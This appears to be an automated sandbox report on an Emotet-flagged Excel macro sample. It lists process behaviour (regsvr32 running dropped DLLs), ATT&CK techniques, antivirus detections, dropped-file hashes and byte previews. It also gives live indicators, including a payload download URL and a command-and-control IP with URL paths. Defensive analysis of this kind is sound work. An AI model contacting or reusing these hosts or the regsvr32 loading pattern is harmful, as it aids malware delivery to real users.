                          Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
                          Source: regsvr32.exe, 00000004.00000002.470572841.00000000003C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100657FF LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100011EF ??3@YAXPAX@Z,??3@YAXPAX@Z,GetProcessHeap,HeapFree,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10021DEA SetUnhandledExceptionFilter,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10021DFC SetUnhandledExceptionFilter,

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 68.183.94.239 80
                          Source: Yara matchFile source: app.xml, type: SAMPLE
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Onodwrlgmyciiaw\qayqfx.jrd"
                          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Yyhjz\waeusmddlxyznd.sfn"
                          Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,WideCharToMultiByte,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesA,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesA,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesA,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,MultiByteToWideChar,
                          Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1001CE60 GetLocalTime,GetSystemTime,GetTimeZoneInformation,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10023F2F GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,
                          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10064D73 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA,

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 5.2.regsvr32.exe.250000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.regsvr32.exe.250000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.regsvr32.exe.230000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.regsvr32.exe.400000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.regsvr32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.regsvr32.exe.3c0000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.regsvr32.exe.1e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.735740378.0000000000250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.469991014.0000000000180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.464483054.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Valid Accounts21
                          Scripting
                          Path Interception111
                          Process Injection
                          1
                          Disable or Modify Tools
                          1
                          Input Capture
                          2
                          System Time Discovery
                          Remote Services1
                          Archive Collected Data
                          Exfiltration Over Other Network Medium13
                          Ingress Tool Transfer
                          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                          Default Accounts1
                          Native API
                          Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                          Deobfuscate/Decode Files or Information
                          LSASS Memory2
                          File and Directory Discovery
                          Remote Desktop Protocol1
                          Input Capture
                          Exfiltration Over Bluetooth1
                          Encrypted Channel
                          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain Accounts43
                          Exploitation for Client Execution
                          Logon Script (Windows)Logon Script (Windows)21
                          Scripting
                          Security Account Manager26
                          System Information Discovery
                          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                          Non-Application Layer Protocol
                          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
                          Obfuscated Files or Information
                          NTDS1
                          Query Registry
                          Distributed Component Object ModelInput CaptureScheduled Transfer22
                          Application Layer Protocol
                          SIM Card SwapCarrier Billing Fraud
                          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script131
                          Masquerading
                          LSA Secrets11
                          Security Software Discovery
                          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.commonRc.common1
                          Virtualization/Sandbox Evasion
                          Cached Domain Credentials1
                          Virtualization/Sandbox Evasion
                          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                          Process Injection
                          DCSync2
                          Process Discovery
                          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                          Hidden Files and Directories
                          Proc Filesystem1
                          Application Window Discovery
                          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                          Regsvr32
                          /etc/passwd and /etc/shadow1
                          Remote System Discovery
                          Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          qd_34768.xlsm40%ReversingLabsDocument-Excel.Trojan.Emotet
                          No Antivirus matches
                          SourceDetectionScannerLabelLinkDownload
                          5.2.regsvr32.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          5.2.regsvr32.exe.250000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                          4.2.regsvr32.exe.230000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          3.2.regsvr32.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                          3.2.regsvr32.exe.3c0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          4.2.regsvr32.exe.180000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                          SourceDetectionScannerLabelLink
                          eles-tech.com10%VirustotalBrowse
                          SourceDetectionScannerLabelLink
                          http://eles-tech.com/css/KzMysMqFMs/11%VirustotalBrowse
                          http://eles-tech.com/css/KzMysMqFMs/100%Avira URL Cloudmalware
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                          https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnurar100%Avira URL Cloudmalware
                          http://ocsp.entrust.net0D0%URL Reputationsafe
                          https://68.183.94.239/2%VirustotalBrowse
                          https://68.183.94.239/100%Avira URL Cloudmalware
                          http://ocsp.entrust.net030%URL Reputationsafe
                          https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnural100%Avira URL Cloudmalware
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          eles-tech.com
                          185.46.40.47
                          truetrueunknown
                          NameMaliciousAntivirus DetectionReputation
                          http://eles-tech.com/css/KzMysMqFMs/true
                          • 11%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnurarregsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          http://crl.entrust.net/server1.crl0regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://ocsp.entrust.net0Dregsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://68.183.94.239/regsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmptrue
                            • 2%, Virustotal, Browse
                            • Avira URL Cloud: malware
                            unknown
                            http://ocsp.entrust.net03regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://68.183.94.239:80/DiyTlQGJuLlFIgtBpxSntEnJrcPFhzwChyUaMhMLcrifUxIxXlgWcSSxyKnuralregsvr32.exe, 00000005.00000002.735823282.0000000000311000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://secure.comodo.com/CPS0regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000005.00000002.735846337.0000000000354000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                68.183.94.239
                                unknownUnited States
                                14061DIGITALOCEAN-ASNUStrue
                                185.46.40.47
                                eles-tech.comTurkey
                                34984TELLCOM-ASTRtrue
                                Joe Sandbox Version:34.0.0 Boulder Opal
                                Analysis ID:601134
                                Start date and time:2022-03-31 20:51:07 +02:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 7m 14s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:qd_34768.xlsm
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of analysed new started processes analysed:8
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.expl.evad.winXLSM@7/9@1/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:
                                • Successful, ratio: 58.5% (good quality ratio 55.9%)
                                • Quality average: 81.3%
                                • Quality standard deviation: 26.8%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .xlsm
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Attach to Office via COM
                                • Scroll down
                                • Close Viewer
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                • TCP Packets have been reduced to 100
                                • Excluded IPs from analysis (whitelisted): 173.222.108.226, 173.222.108.210
                                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                TimeTypeDescription
                                22:51:52API Interceptor584x Sleep call for process: regsvr32.exe modified
                                No context
                                No context
                                No context
                                No context
                                No context
                                Process:C:\Windows\SysWOW64\regsvr32.exe
                                File Type:Microsoft Cabinet archive data, 60992 bytes, 1 file
                                Category:dropped
                                Size (bytes):60992
                                Entropy (8bit):7.994637486921971
                                Encrypted:true
                                SSDEEP:1536:1ccLOuSwR3W8vM1pjd8MpGwIMESUnWWiidx34:1ccLm6W8vUBCMpGwIMEDnqe4
                                MD5:637481DF32351129E60560D5A5C100B5
                                SHA1:A46AEE6E5A4A4893FBA5806BCC14FC7FB3CE80AE
                                SHA-256:1F1029D94CA4656A577D554CEDD79D447658F475AF08620084897A5523587052
                                SHA-512:604BFD0A78A57DFDDD45872803501AD89491E37E89E0778B0F13644FA9164FF509955A57469DFDD65A05BBEDAF0ACB669F68430E84800D17EFE7D360A70569E3
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:MSCF....@.......,...................I.......]t........VT+V .authroot.stl.K.&.4..CK..<Tk...c_.d....A.K.....Y.f.]%.BJ$RHnT..i/.]...s.H..k....n.3.......S..9.s.....3H$M.%...h..qV.=M..].4.I.....V:F.h]......B`..,......D.0a....H.G..:...XF.F..MJ`.H. 7......._....lE..he.4|.?....h...7..P~8.|.,. .....#0+..o...g...}U2n............'.Dp.;..f..ljX.Dx..r<'.1RA3B0<..D.z...)D|..8<..c..'XH..I,.Y..d.b.".A......cm_nVb[w..rDp.....y%.|7...^.#.#[...3~3.g..CN......k;...C.`.C.iB.`-...|.....y.(....]~`>... .p..q<..g..i...y..|.....I...T8B.Ag#U......G.9+.x6..a.c.3...X.4E........N..:X.F...S...X...ku..O.J...)Z....PAk..%.+..n..z<.2.......w2c@.((*.J.dN...\!o@.........0..3.`.DU.3.%0.G...4Sv...5.T.?.......p..".........|..j.4.H...g.(...^.....w.......|...#..og)>..t.}.k.G|.2K.5..ik.......0..~ ">......A...ku..d..Y..@D....YO.{.9..:)..L..=D..O...6.n....ui<..w.[O...P>..y.L....J......r.!.5.u.3..-`..r,aH.B <..t..8.c.{u.<'.3.........u.3..[W.....2...$..eAo.m...w...............g$m.`..
                                Process:C:\Windows\SysWOW64\regsvr32.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):330
                                Entropy (8bit):3.168531669823635
                                Encrypted:false
                                SSDEEP:6:kKHrN+SkQlPlEGYRMY9z+4KlDA3RUeAxf1:/EkPlE99SNxAhUekf1
                                MD5:EC813D37860409533A6C19375D0E37AE
                                SHA1:6248F61760CB0EE5E1501D698912F62FC0EEDAE5
                                SHA-256:CDADF7322EABCBD0750E90ABE538897D0190DFD78450BBC259777DB7A754B488
                                SHA-512:DF6C6EFFACB11F4243B3BBCE349D9216D98E4276F4D0F05B0A729F36B507449E3500CB6FB32CF811701B19A9D3E75693C450FA20A1E27C8559110BBD72B68771
                                Malicious:false
                                Reputation:low
                                Preview:p...... ...........X.E..(....................................................... ........%,.)......(...........@...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.2.5.2.c.e.6.b.2.2.9.d.8.1.:.0."...
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:downloaded
                                Size (bytes):868352
                                Entropy (8bit):6.023557193294397
                                Encrypted:false
                                SSDEEP:12288:OBOHvWMwoyDdgp4W5dhdu1sRcwg8b3UHv8qDznxN6t:OX/RgaW5dhc8oHvbzn6
                                MD5:B919214A85847B6AB4758021C740E652
                                SHA1:590C10843F8D572BE1C7BE35C04292DB17839ECB
                                SHA-256:3E7C8C7B2A136FA9D519189F78549DE4783417CFB6E8285351832088E5C8883B
                                SHA-512:1E086096D9886552C6D58BF4235EAC30BEDA9779C31ECCF2B2C4FC5A054F18D27E06BFF239424466028016ED619922FB9241720B983AF0D2DA90277B3C4B003A
                                Malicious:true
                                Reputation:low
                                IE Cache URL:http://eles-tech.com/css/KzMysMqFMs/
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.]...]...].......x...]...e...?...N...]........F...........\..........\...Rich]...........................PE..L....1Fb...........!....................................................................................................................34......................\t...................................................................................text...~........................... ..`.rdata..N7.......@..................@..@.data...(........P..................@....idata...<.......@...0..............@....rsrc...34.......@...p..............@..@.reloc..G...........................@..B........................................................................................................................................................................................................................................................................
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 2159x57, frames 3
                                Category:dropped
                                Size (bytes):29992
                                Entropy (8bit):7.86369524906802
                                Encrypted:false
                                SSDEEP:768:IxNskmoKjBvK3HqK88F/G6YzATUfJnXYS6oN:IDLmXi3JvG6YzATOJnXYSXN
                                MD5:C8FC17FF030FEB3383D8889F69ABBB9C
                                SHA1:7A1A55B6464BA4BCC165856C1AB7D646652755BD
                                SHA-256:54E99B9DCC602AB83A98AAE60B965D0E2BB3B6281D0A65DDBA4D14DD53ABD30F
                                SHA-512:D68C053AF7AD5DF220D22399EBA957C57704C5C6845664851AF69DCAB5043B85FDCDAA90B33F64EB665D7421AAF2A4E25385E95FC397CB59135B7C0AED1543B4
                                Malicious:false
                                Reputation:low
                                Preview:......JFIF.....`.`.....C....................................................................C.......................................................................9.o.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..|..+.?H.(.*....j...a.3]......n...i..I.."RF[.'....&..&.hP.4.._......m.%.b12Q.wo..Z...n<.~.....a...u.......Ch..........n.....D..$.$.j..../~..)....m.]Rh...W....2F...Xd._yO.G*.J.Sj.:..G.&~sS..*.t....6....h.P..;.....2..X....F.....+=j$...x.p..'...b.Z.......'.e..&6}.....Mu>.%.0...o...T.i.k.O..(.....(.q...PF...Z.(.....z.2...)Y.>..E*..8V?A@........4....v...(...e..
                                Process:C:\Windows\SysWOW64\regsvr32.exe
                                File Type:Microsoft Cabinet archive data, 60992 bytes, 1 file
                                Category:dropped
                                Size (bytes):60992
                                Entropy (8bit):7.994637486921971
                                Encrypted:true
                                SSDEEP:1536:1ccLOuSwR3W8vM1pjd8MpGwIMESUnWWiidx34:1ccLm6W8vUBCMpGwIMEDnqe4
                                MD5:637481DF32351129E60560D5A5C100B5
                                SHA1:A46AEE6E5A4A4893FBA5806BCC14FC7FB3CE80AE
                                SHA-256:1F1029D94CA4656A577D554CEDD79D447658F475AF08620084897A5523587052
                                SHA-512:604BFD0A78A57DFDDD45872803501AD89491E37E89E0778B0F13644FA9164FF509955A57469DFDD65A05BBEDAF0ACB669F68430E84800D17EFE7D360A70569E3
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:MSCF....@.......,...................I.......]t........VT+V .authroot.stl.K.&.4..CK..<Tk...c_.d....A.K.....Y.f.]%.BJ$RHnT..i/.]...s.H..k....n.3.......S..9.s.....3H$M.%...h..qV.=M..].4.I.....V:F.h]......B`..,......D.0a....H.G..:...XF.F..MJ`.H. 7......._....lE..he.4|.?....h...7..P~8.|.,. .....#0+..o...g...}U2n............'.Dp.;..f..ljX.Dx..r<'.1RA3B0<..D.z...)D|..8<..c..'XH..I,.Y..d.b.".A......cm_nVb[w..rDp.....y%.|7...^.#.#[...3~3.g..CN......k;...C.`.C.iB.`-...|.....y.(....]~`>... .p..q<..g..i...y..|.....I...T8B.Ag#U......G.9+.x6..a.c.3...X.4E........N..:X.F...S...X...ku..O.J...)Z....PAk..%.+..n..z<.2.......w2c@.((*.J.dN...\!o@.........0..3.`.DU.3.%0.G...4Sv...5.T.?.......p..".........|..j.4.H...g.(...^.....w.......|...#..og)>..t.}.k.G|.2K.5..ik.......0..~ ">......A...ku..d..Y..@D....YO.{.9..:)..L..=D..O...6.n....ui<..w.[O...P>..y.L....J......r.!.5.u.3..-`..r,aH.B <..t..8.c.{u.<'.3.........u.3..[W.....2...$..eAo.m...w...............g$m.`..
                                Process:C:\Windows\SysWOW64\regsvr32.exe
                                File Type:data
                                Category:modified
                                Size (bytes):160861
                                Entropy (8bit):6.301243810050655
                                Encrypted:false
                                SSDEEP:1536:0I/6crtilgCyNY2Ip/5ib6NWdm1wpTru2RPZz04D8rlCMiB3XlMt63:070imCy/dm0Tru2RN97MiVG43
                                MD5:30644DA711C99BE812B06023C163B751
                                SHA1:EFFC167CE6206A4E92375C9509943CC86058E3C7
                                SHA-256:96DBA3D67364C1E75DAB241D4A023B48F4D6453F495175B210F525E930CF144B
                                SHA-512:7799722409CB4BD9098312235824D72427F8761495B2824798E69AF43021E180BBC2679E70CF6EC3CDA5C8422CE601051AD674587321C5F7419FAED1B027432E
                                Malicious:false
                                Preview:0..tX..*.H.........tH0..tC...1.0...`.H.e......0..d...+.....7.....d.0..d.0...+.....7........(.?.....220222184440Z0...+......0..dY0..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):165
                                Entropy (8bit):1.4377382811115937
                                Encrypted:false
                                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                MD5:797869BB881CFBCDAC2064F92B26E46F
                                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                Malicious:true
                                Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):868352
                                Entropy (8bit):6.023557193294397
                                Encrypted:false
                                SSDEEP:12288:OBOHvWMwoyDdgp4W5dhdu1sRcwg8b3UHv8qDznxN6t:OX/RgaW5dhc8oHvbzn6
                                MD5:B919214A85847B6AB4758021C740E652
                                SHA1:590C10843F8D572BE1C7BE35C04292DB17839ECB
                                SHA-256:3E7C8C7B2A136FA9D519189F78549DE4783417CFB6E8285351832088E5C8883B
                                SHA-512:1E086096D9886552C6D58BF4235EAC30BEDA9779C31ECCF2B2C4FC5A054F18D27E06BFF239424466028016ED619922FB9241720B983AF0D2DA90277B3C4B003A
                                Malicious:true
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.]...]...].......x...]...e...?...N...]........F...........\..........\...Rich]...........................PE..L....1Fb...........!....................................................................................................................34......................\t...................................................................................text...~........................... ..`.rdata..N7.......@..................@..@.data...(........P..................@....idata...<.......@...0..............@....rsrc...34.......@...p..............@..@.reloc..G...........................@..B........................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\regsvr32.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):868352
                                Entropy (8bit):6.023557193294397
                                Encrypted:false
                                SSDEEP:12288:OBOHvWMwoyDdgp4W5dhdu1sRcwg8b3UHv8qDznxN6t:OX/RgaW5dhc8oHvbzn6
                                MD5:B919214A85847B6AB4758021C740E652
                                SHA1:590C10843F8D572BE1C7BE35C04292DB17839ECB
                                SHA-256:3E7C8C7B2A136FA9D519189F78549DE4783417CFB6E8285351832088E5C8883B
                                SHA-512:1E086096D9886552C6D58BF4235EAC30BEDA9779C31ECCF2B2C4FC5A054F18D27E06BFF239424466028016ED619922FB9241720B983AF0D2DA90277B3C4B003A
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.]...]...].......x...]...e...?...N...]........F...........\..........\...Rich]...........................PE..L....1Fb...........!....................................................................................................................34......................\t...................................................................................text...~........................... ..`.rdata..N7.......@..................@..@.data...(........P..................@....idata...<.......@...0..............@....rsrc...34.......@...p..............@..@.reloc..G...........................@..B........................................................................................................................................................................................................................................................................
                                File type:Microsoft Excel 2007+
                                Entropy (8bit):7.7318764495518275
                                TrID:
                                • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                • ZIP compressed archive (8000/1) 8.08%
                                File name:qd_34768.xlsm
                                File size:47738
                                MD5:07f30f1fa5420f050ea5929af0f95265
                                SHA1:6310b51fca4003fb36252367f058c2e990ba5734
                                SHA256:48f3ef54ff2ed0b44d5e4836c56a3a8f3214d7214278172ef84166f6d42cc067
                                SHA512:f16cad27fc864c23ed1c753f5eb319bf79f9d96c40edc70924b25410d5547c2c1bbb4c06b002f8e2bb246d35408bd4fa0e2e526a36ceb344fa399324e2758c80
